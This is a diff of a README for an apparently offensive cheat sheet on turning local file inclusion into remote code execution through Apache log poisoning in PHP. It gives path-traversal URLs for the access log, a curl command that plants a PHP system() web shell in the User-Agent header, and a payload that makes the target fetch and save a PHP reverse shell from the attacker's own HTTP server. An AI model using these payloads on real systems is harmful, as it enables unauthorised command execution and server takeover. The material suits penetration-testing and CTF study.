RoqueNight/LFI---RCE-Cheat-Sheet/README.md

 # LFI to RCE via Apache Log File Poisoning (PHP)

 ```
-Example URL: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log // Must have the ability to read the log file
+Example URL: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log

+// Must have the ability to read the log file

-Payload: curl "http://192.168.8.108/" -H "User-Agent: <?php system(\$_GET['cmd']); ?>" // Replace IP with your target
+Payload: curl "http://192.168.8.108/" -H "User-Agent: <?php system(\$_GET['cmd']); ?>"

+// Replace IP with your target

 Execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log&cmd=id

 OR
-python -m SimpleHTTPServer 9000 // You can use any port
+python -m SimpleHTTPServer 9000

+// You can use any port

-Payload: curl "http://<remote_ip>/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://<local_ip>:9000/shell-php-rev.php')) ?>" // This will download the PHP reverse shell from your web server onto the target
+Payload: curl "http://<remote_ip>/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://<local_ip>:9000/shell-php-rev.php')) ?>"

+// This will download the PHP reverse shell from your web server onto the target

-// file_put_contents('shell.php') = What it will be saved locally on the target
+file_put_contents('shell.php')                                // What it will be saved locally on the target
-// file_get_contents('http://<local_ip>:9000/shell-php-rev.php') = Where is the shell on YOUR pc and WHAT is it called
+file_get_contents('http://<local_ip>:9000/shell-php-rev.php') // Where is the shell on YOUR pc and WHAT is it called

 Execute PHP Reverse Shell: http//10.10.10.10/shell.php
 ```